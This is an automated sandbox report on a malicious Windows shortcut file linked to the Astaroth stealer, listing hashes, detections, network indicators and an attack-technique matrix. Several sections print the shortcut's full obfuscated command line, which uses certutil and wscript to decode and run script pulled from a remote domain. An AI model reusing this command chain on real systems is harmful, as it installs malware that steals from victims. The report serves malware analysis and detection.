Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
uk231b27we.lnk

Overview

General Information

Sample Name:uk231b27we.lnk
Analysis ID:795686
MD5:992f5faaef370f7963b09123eaee18dd
SHA1:cf99a5906e22105ade1f367f0c289fafa9952a1c
SHA256:d7ddebfa36f629e5ef41b692140e2c06f23b5c8017040215eaf0247a7db3b2f7
Tags:AstarothBRAgeoGuildmalnk
Infos:

Detection

Score:68
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

System process connects to network (likely due to code injection or exploit)
Windows shortcut file (LNK) starts blacklisted processes
Snort IDS alert for network traffic
Obfuscated command line found
Queries the volume information (name, serial number etc) of a device
Uses a known web browser user agent for HTTP communication
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Creates a process in suspended mode (likely to inject code)
IP address seen in connection with other malware
Found WSH timer for Javascript or VBS script (likely evasive script)

Classification

  • System is w10x64
  • cmd.exe (PID: 6120 cmdline: C:\Windows\system32\cmd.exe /V/D/c md C:\QxdHVBD\>nul 2>&1 &&s^eT XECY=C:\QxdHVBD\^QxdHVBD.^jS&&echo dmFyIEMxOHA9InNjIisiciI7RDE4cD0iaXAiKyJ0OmgiO0UxOHA9IlQiKyJ0UCIrIjoiO0dldE9iamVjdChDMThwK0QxOHArRTE4cCsiLy9nd2FlOC5pbmR1c3RyeWluZmx1ZW5jZS5zaG9wLz8zLyIpOw==>!XECY!&&cErtUtil -f -dEco^de !XECY! !XECY!&&ca^ll !XECY! MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
    • certutil.exe (PID: 1648 cmdline: cErtUtil -f -dEcode C:\QxdHVBD\QxdHVBD.jS C:\QxdHVBD\QxdHVBD.jS MD5: EB199893441CED4BBBCB547FE411CF2D)
    • wscript.exe (PID: 5220 cmdline: "C:\Windows\System32\WScript.exe" "C:\QxdHVBD\QxdHVBD.jS" MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
Timestamp:192.168.2.3172.67.221.2249681802851288 02/01/23-07:46:04.571673
SID:2851288
Source Port:49681
Destination Port:80
Protocol:TCP
Classtype:A Network Trojan was detected

Click to jump to signature section

Show All Signature Results
Source: unknownHTTPS traffic detected: 104.16.124.96:443 -> 192.168.2.3:49682 version: TLS 1.2

Networking

barindex
Source: C:\Windows\System32\wscript.exeDomain query: gwae8.industryinfluence.shop
Source: C:\Windows\System32\wscript.exeDomain query: www.cloudflare.com
Source: C:\Windows\System32\wscript.exeNetwork Connect: 172.67.221.22 80Jump to behavior
Source: C:\Windows\System32\wscript.exeNetwork Connect: 104.16.124.96 443Jump to behavior
Source: TrafficSnort IDS: 2851288 ETPRO TROJAN Astaroth Stealer Activity (GET) 192.168.2.3:49681 -> 172.67.221.22:80
Source: global trafficHTTP traffic detected: GET /cdn-cgi/error HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Connection: Keep-AliveHost: www.cloudflare.com
Source: global trafficHTTP traffic detected: GET /?3/ HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: gwae8.industryinfluence.shopConnection: Keep-Alive
Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: Joe Sandbox ViewIP Address: 104.16.124.96 104.16.124.96
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49682
Source: unknownNetwork traffic detected: HTTP traffic on port 49682 -> 443
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 01 Feb 2023 06:46:05 GMTTransfer-Encoding: chunkedConnection: closeCF-Cache-Status: MISSSet-Cookie: __cf_bm=HuxegvGqhPYj.RmC4Z5BvFwAUbphzy6uoWYlMjbn75I-1675233965-0-Aaaf9mQqj3uibNCAaCSZwu7+dUgj+Q0HUsqcC05pF3vk4twZOxrm6f79uC6VSOXzSChkWjNH93sJcyJueQo47SqbhV2WUSbMN6AYB2WG5yRf; path=/; expires=Wed, 01-Feb-23 07:16:05 GMT; domain=.www.cloudflare.com; HttpOnly; Secure; SameSite=NoneServer-Timing: cf-q-config;dur=6.0000002122251e-06Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=nm6%2B2%2FiRNIaRnavKlgeBIJCR2OhRC7bTShI3kSlts9Bq%2F4TeHdgYWVJBiLxcPeIM1sfMbk%2FjhgDxcvV7GOQwTIwA95teLMMeDeK67IhNAo8%2BVCpBOBcm8gzNRgpFUH5GK2A%2FVA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Set-Cookie: __cflb=02DiuJFZNR1vT983reJ7ooDAdV9yu7NGnKVGuWQtbjLxL; SameSite=None; Secure; path=/; expires=Thu, 02-Feb-23 05:46:05 GMT; HttpOnlyServer: cloudflareCF-RAY: 7928ba5a6cd990ee-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
Source: wscript.exe, 00000003.00000003.257912420.0000029B8EF4B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: hTtP://gwae8.industryinfluence.shop/?3/
Source: wscript.exe, 00000003.00000003.257885861.0000029B8EFE8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.251546620.0000029B8EFE8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000002.258534912.0000029B8EFE8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.251838024.0000029B8EFE8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.252114824.0000029B8EFE8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: wscript.exe, 00000003.00000003.251866049.0000029B8EFBE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000002.258349869.0000029B8EFBE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.251623224.0000029B8EFBE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gwae8.industryinfluence.shop/
Source: wscript.exe, 00000003.00000003.251961509.0000029B8EF96000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gwae8.industryinfluence.shop/?3/
Source: wscript.exe, 00000003.00000003.251866049.0000029B8EFBE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000002.258349869.0000029B8EFBE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.251623224.0000029B8EFBE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gwae8.industryinfluence.shop/b
Source: wscript.exe, 00000003.00000002.258349869.0000029B8EF8D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.257912420.0000029B8EF8D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.251623224.0000029B8EF9D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.251866049.0000029B8EF8D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.251961509.0000029B8EF96000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
Source: wscript.exe, 00000003.00000002.258349869.0000029B8EF8D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.257912420.0000029B8EF8D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.251623224.0000029B8EF9D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.251866049.0000029B8EF8D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.251961509.0000029B8EF96000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/
Source: wscript.exe, 00000003.00000003.251961509.0000029B8EF96000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/cdn-cgi/error
Source: wscript.exe, 00000003.00000003.251623224.0000029B8EF9D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.251866049.0000029B8EF8D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.251961509.0000029B8EF96000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/cdn-cgi/error&
Source: wscript.exe, 00000003.00000003.251866049.0000029B8EFBE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.251623224.0000029B8EFBE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/cdn-cgi/error(
Source: wscript.exe, 00000003.00000003.251785022.0000029B90E13000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/cdn-cgi/error2.L
Source: wscript.exe, 00000003.00000003.251623224.0000029B8EFD0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000002.258349869.0000029B8EFD0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.257912420.0000029B8EFD0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.251961509.0000029B8EFD0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/cdn-cgi/errorZ
Source: wscript.exe, 00000003.00000003.251785022.0000029B90E13000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/cdn-cgi/errorZ.4
Source: wscript.exe, 00000003.00000002.258349869.0000029B8EF8D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.257912420.0000029B8EF8D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.251623224.0000029B8EF9D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.251866049.0000029B8EF8D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.251961509.0000029B8EF96000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/~
Source: unknownDNS traffic detected: queries for: gwae8.industryinfluence.shop
Source: global trafficHTTP traffic detected: GET /cdn-cgi/error HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Connection: Keep-AliveHost: www.cloudflare.com
Source: global trafficHTTP traffic detected: GET /?3/ HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: gwae8.industryinfluence.shopConnection: Keep-Alive
Source: unknownHTTPS traffic detected: 104.16.124.96:443 -> 192.168.2.3:49682 version: TLS 1.2
Source: C:\Windows\System32\certutil.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /V/D/c md C:\QxdHVBD\>nul 2>&1 &&s^eT XECY=C:\QxdHVBD\^QxdHVBD.^jS&&echo dmFyIEMxOHA9InNjIisiciI7RDE4cD0iaXAiKyJ0OmgiO0UxOHA9IlQiKyJ0UCIrIjoiO0dldE9iamVjdChDMThwK0QxOHArRTE4cCsiLy9nd2FlOC5pbmR1c3RyeWluZmx1ZW5jZS5zaG9wLz8zLyIpOw==>!XECY!&&cErtUtil -f -dEco^de !XECY! !XECY!&&ca^ll !XECY!
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\certutil.exe cErtUtil -f -dEcode C:\QxdHVBD\QxdHVBD.jS C:\QxdHVBD\QxdHVBD.jS
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\QxdHVBD\QxdHVBD.jS"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\certutil.exe cErtUtil -f -dEcode C:\QxdHVBD\QxdHVBD.jS C:\QxdHVBD\QxdHVBD.jSJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\QxdHVBD\QxdHVBD.jS" Jump to behavior
Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32Jump to behavior
Source: classification engineClassification label: mal68.evad.winLNK@6/1@2/2
Source: C:\Windows\System32\cmd.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
Source: C:\Windows\System32\wscript.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\System32\wscript.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\System32\wscript.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior

Data Obfuscation

barindex
Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /V/D/c md C:\QxdHVBD\>nul 2>&1 &&s^eT XECY=C:\QxdHVBD\^QxdHVBD.^jS&&echo dmFyIEMxOHA9InNjIisiciI7RDE4cD0iaXAiKyJ0OmgiO0UxOHA9IlQiKyJ0UCIrIjoiO0dldE9iamVjdChDMThwK0QxOHArRTE4cCsiLy9nd2FlOC5pbmR1c3RyeWluZmx1ZW5jZS5zaG9wLz8zLyIpOw==>!XECY!&&cErtUtil -f -dEco^de !XECY! !XECY!&&ca^ll !XECY!

Persistence and Installation Behavior

barindex
Source: LNK fileProcess created: C:\Windows\System32\cmd.exe
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
Source: wscript.exe, 00000003.00000002.258349869.0000029B8EF4D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.257912420.0000029B8EF4B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.251623224.0000029B8EFD0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000002.258349869.0000029B8EFD0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.251623224.0000029B8EF68000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.257912420.0000029B8EFD0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.251961509.0000029B8EFD0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.251866049.0000029B8EF69000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: wscript.exe, 00000003.00000003.251866049.0000029B8EF80000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.251623224.0000029B8EF80000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000002.258349869.0000029B8EF80000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW@

HIPS / PFW / Operating System Protection Evasion

barindex
Source: C:\Windows\System32\wscript.exeDomain query: gwae8.industryinfluence.shop
Source: C:\Windows\System32\wscript.exeDomain query: www.cloudflare.com
Source: C:\Windows\System32\wscript.exeNetwork Connect: 172.67.221.22 80Jump to behavior
Source: C:\Windows\System32\wscript.exeNetwork Connect: 104.16.124.96 443Jump to behavior
Source: unknownProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /v/d/c md c:\qxdhvbd\>nul 2>&1 &&s^et xecy=c:\qxdhvbd\^qxdhvbd.^js&&echo dmfyiemxoha9innjiisicii7rde4cd0iaxaikyj0omgio0uxoha9ilqikyj0ucirijoio0dlde9iamvjdchdmthwk0qxoharrte4ccsily9nd2floc5pbmr1c3ryewluzmx1zw5jzs5zag9wlz8zlyipow==>!xecy!&&certutil -f -deco^de !xecy! !xecy!&&ca^ll !xecy!
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\certutil.exe cErtUtil -f -dEcode C:\QxdHVBD\QxdHVBD.jS C:\QxdHVBD\QxdHVBD.jSJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\QxdHVBD\QxdHVBD.jS" Jump to behavior
Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid Accounts11
Command and Scripting Interpreter
Path Interception111
Process Injection
111
Process Injection
OS Credential Dumping1
Security Software Discovery
Remote ServicesData from Local SystemExfiltration Over Other Network Medium1
Encrypted Channel
Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default Accounts1
Scripting
Boot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
Deobfuscate/Decode Files or Information
LSASS Memory1
Process Discovery
Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth3
Non-Application Layer Protocol
Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)1
Scripting
Security Account Manager1
File and Directory Discovery
SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration14
Application Layer Protocol
Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Binary PaddingNTDS12
System Information Discovery
Distributed Component Object ModelInput CaptureScheduled Transfer3
Ingress Tool Transfer
SIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA Secrets1
Remote System Discovery
SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
No Antivirus matches
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
http://gwae8.industryinfluence.shop/b0%Avira URL Cloudsafe
hTtP://gwae8.industryinfluence.shop/?3/0%Avira URL Cloudsafe
http://gwae8.industryinfluence.shop/0%Avira URL Cloudsafe
NameIPActiveMaliciousAntivirus DetectionReputation
www.cloudflare.com
104.16.124.96
truefalse
    high
    gwae8.industryinfluence.shop
    172.67.221.22
    truetrue
      unknown
      NameMaliciousAntivirus DetectionReputation
      https://www.cloudflare.com/cdn-cgi/errorfalse
        high
        http://gwae8.industryinfluence.shop/?3/true
          unknown
          NameSourceMaliciousAntivirus DetectionReputation
          http://gwae8.industryinfluence.shop/bwscript.exe, 00000003.00000003.251866049.0000029B8EFBE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000002.258349869.0000029B8EFBE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.251623224.0000029B8EFBE000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          hTtP://gwae8.industryinfluence.shop/?3/wscript.exe, 00000003.00000003.257912420.0000029B8EF4B000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://www.cloudflare.com/cdn-cgi/errorZwscript.exe, 00000003.00000003.251623224.0000029B8EFD0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000002.258349869.0000029B8EFD0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.257912420.0000029B8EFD0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.251961509.0000029B8EFD0000.00000004.00000020.00020000.00000000.sdmpfalse
            high
            https://www.cloudflare.com/wscript.exe, 00000003.00000002.258349869.0000029B8EF8D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.257912420.0000029B8EF8D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.251623224.0000029B8EF9D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.251866049.0000029B8EF8D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.251961509.0000029B8EF96000.00000004.00000020.00020000.00000000.sdmpfalse
              high
              http://gwae8.industryinfluence.shop/wscript.exe, 00000003.00000003.251866049.0000029B8EFBE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000002.258349869.0000029B8EFBE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.251623224.0000029B8EFBE000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://www.cloudflare.com/cdn-cgi/error(wscript.exe, 00000003.00000003.251866049.0000029B8EFBE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.251623224.0000029B8EFBE000.00000004.00000020.00020000.00000000.sdmpfalse
                high
                https://www.cloudflare.com/cdn-cgi/errorZ.4wscript.exe, 00000003.00000003.251785022.0000029B90E13000.00000004.00000020.00020000.00000000.sdmpfalse
                  high
                  https://www.cloudflare.com/cdn-cgi/error&wscript.exe, 00000003.00000003.251623224.0000029B8EF9D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.251866049.0000029B8EF8D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.251961509.0000029B8EF96000.00000004.00000020.00020000.00000000.sdmpfalse
                    high
                    https://www.cloudflare.com/cdn-cgi/error2.Lwscript.exe, 00000003.00000003.251785022.0000029B90E13000.00000004.00000020.00020000.00000000.sdmpfalse
                      high
                      https://www.cloudflare.com/~wscript.exe, 00000003.00000002.258349869.0000029B8EF8D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.257912420.0000029B8EF8D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.251623224.0000029B8EF9D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.251866049.0000029B8EF8D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.251961509.0000029B8EF96000.00000004.00000020.00020000.00000000.sdmpfalse
                        high
                        • No. of IPs < 25%
                        • 25% < No. of IPs < 50%
                        • 50% < No. of IPs < 75%
                        • 75% < No. of IPs
                        IPDomainCountryFlagASNASN NameMalicious
                        172.67.221.22
                        gwae8.industryinfluence.shopUnited States
                        13335CLOUDFLARENETUStrue
                        104.16.124.96
                        www.cloudflare.comUnited States
                        13335CLOUDFLARENETUSfalse
                        Joe Sandbox Version:36.0.0 Rainbow Opal
                        Analysis ID:795686
                        Start date and time:2023-02-01 07:45:08 +01:00
                        Joe Sandbox Product:CloudBasic
                        Overall analysis duration:0h 3m 33s
                        Hypervisor based Inspection enabled:false
                        Report type:full
                        Cookbook file name:default.jbs
                        Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                        Number of analysed new started processes analysed:4
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:0
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • HDC enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Sample file name:uk231b27we.lnk
                        Detection:MAL
                        Classification:mal68.evad.winLNK@6/1@2/2
                        EGA Information:Failed
                        HDC Information:Failed
                        HCA Information:
                        • Successful, ratio: 100%
                        • Number of executed functions: 0
                        • Number of non-executed functions: 0
                        Cookbook Comments:
                        • Found application associated with file extension: .lnk
                        • Stop behavior analysis, all processes terminated
                        • Exclude process from analysis (whitelisted): conhost.exe
                        • Excluded domains from analysis (whitelisted): fs.microsoft.com
                        • Not all processes where analyzed, report is missing behavior information
                        • Report size getting too big, too many NtOpenKeyEx calls found.
                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                        • Report size getting too big, too many NtQueryValueKey calls found.
                        No simulations
                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                        104.16.124.96ATT81811.htmlGet hashmaliciousBrowse
                          https://app.seidat.com/presentation/shared/jJGTcgHFNaFjMofr2Get hashmaliciousBrowse
                            PayApp_EFTPay3540987.htmGet hashmaliciousBrowse
                              x6V6IyDvkG.cmdGet hashmaliciousBrowse
                                https://ppleche.blob.core.windows.net/kjhg/trial.html?sp=r&st=2023-01-26T17:09:13Z&se=2023-03-07T01:09:13Z&spr=https&sv=2021-06-08&sr=b&sig=j50cMPgmBCzZqE3hQzNzmyEzW0Ct%2FE7o0zy7ah7TYOA%3DGet hashmaliciousBrowse
                                  https://eferreira.clickfunnels.com/webinar-registrationdxyd7k9qGet hashmaliciousBrowse
                                    https://mail.turing.com/api/analytics?ti=d554d536f06a156d824003d0c664b257c1ebe0746f5c636f01cb954c5f0c4b684821ae3ba8e679c9e7728c86aa69b0b0eed472c96393f62a0c431339782e0ac4d40f4a8cad32476fff07a90a24abc253eae29ade09a4a164d68248967df03bc0b5257f664b57a390cc3682f8eca1aefd040988f60d0b6f829267aae6229c4d&rd=http://www.Xcelenergy325.pageworks.com.au/cindy.a.hoffman/Y2luZHkuYS5ob2ZmbWFuQHhjZWxlbmVyZ3kuY29tGet hashmaliciousBrowse
                                      cL8CyFuzWP.lnkGet hashmaliciousBrowse
                                        https://www.sipps.it/?download=1&kccpid=5733068&kcccount=///h7u77d.codesandbox.io?e=Y291cnRuZXkud2FyZGVuQGJhcm5ldC5nb3YudWs=Get hashmaliciousBrowse
                                          jGsBbpdEav.cmdGet hashmaliciousBrowse
                                            https://d8wgyfhda663c06be7f17b7.pacificx.ru/Get hashmaliciousBrowse
                                              Doc_____________35665765676890.htmlGet hashmaliciousBrowse
                                                (2) EFT Payment Confirmation.htmGet hashmaliciousBrowse
                                                  5jnf3Yyito.lnkGet hashmaliciousBrowse
                                                    Report.htmGet hashmaliciousBrowse
                                                      malicious 2.htmlGet hashmaliciousBrowse
                                                        https://www.bing.com/ck/a?!&&p=c9c2566e4ab710b4JmltdHM9MTY3Mjc5MDQwMCZpZ3VpZD0xZGI0MmQwZi0yMjEwLTZhMjQtMzZhNC0zZjgwMjNlZDZiOGMmaW5zaWQ9NTE2NA&ptn=3&hsh=3&fclid=1db42d0f-2210-6a24-36a4-3f8023ed6b8c&u=a1aHR0cHM6Ly95MHRkN2cuY29kZXNhbmRib3guaW8vP3FsPWRhdmlkZnVuZ0BoYW5nbHVuZy5jb20NGet hashmaliciousBrowse
                                                          FormularioCorreios1C1BNSBRBR937BR944_206.53767894.393634.04789.lNk.lnkGet hashmaliciousBrowse
                                                            NEW VOICEMAIL _MP3_1252022 92955 a.m..htmlGet hashmaliciousBrowse
                                                              #U25b6#Ufe0fPLAY MESSAGE93457.htmGet hashmaliciousBrowse
                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                www.cloudflare.comgzLeH3Dmtn.lnkGet hashmaliciousBrowse
                                                                • 104.16.123.96
                                                                ATT81811.htmlGet hashmaliciousBrowse
                                                                • 104.16.124.96
                                                                https://app.seidat.com/presentation/shared/jJGTcgHFNaFjMofr2Get hashmaliciousBrowse
                                                                • 104.16.124.96
                                                                https://app.seidat.com/presentation/shared/HdqZQyA6vXx5LMJDeGet hashmaliciousBrowse
                                                                • 104.16.123.96
                                                                IRS-REVENUE-LETTER.HTMGet hashmaliciousBrowse
                                                                • 104.16.123.96
                                                                PayApp_EFTPay3540987.htmGet hashmaliciousBrowse
                                                                • 104.16.123.96
                                                                Pyo37mDzQ2.lnkGet hashmaliciousBrowse
                                                                • 104.16.123.96
                                                                x6V6IyDvkG.cmdGet hashmaliciousBrowse
                                                                • 104.16.124.96
                                                                https://cblay.clickfunnels.com/auto-webinar-registration1674809143095Get hashmaliciousBrowse
                                                                • 104.16.123.96
                                                                https://ppleche.blob.core.windows.net/kjhg/trial.html?sp=r&st=2023-01-26T17:09:13Z&se=2023-03-07T01:09:13Z&spr=https&sv=2021-06-08&sr=b&sig=j50cMPgmBCzZqE3hQzNzmyEzW0Ct%2FE7o0zy7ah7TYOA%3DGet hashmaliciousBrowse
                                                                • 104.16.124.96
                                                                http://ogs0inwufq6399dabccaca6.crashtrs.ruGet hashmaliciousBrowse
                                                                • 104.16.123.96
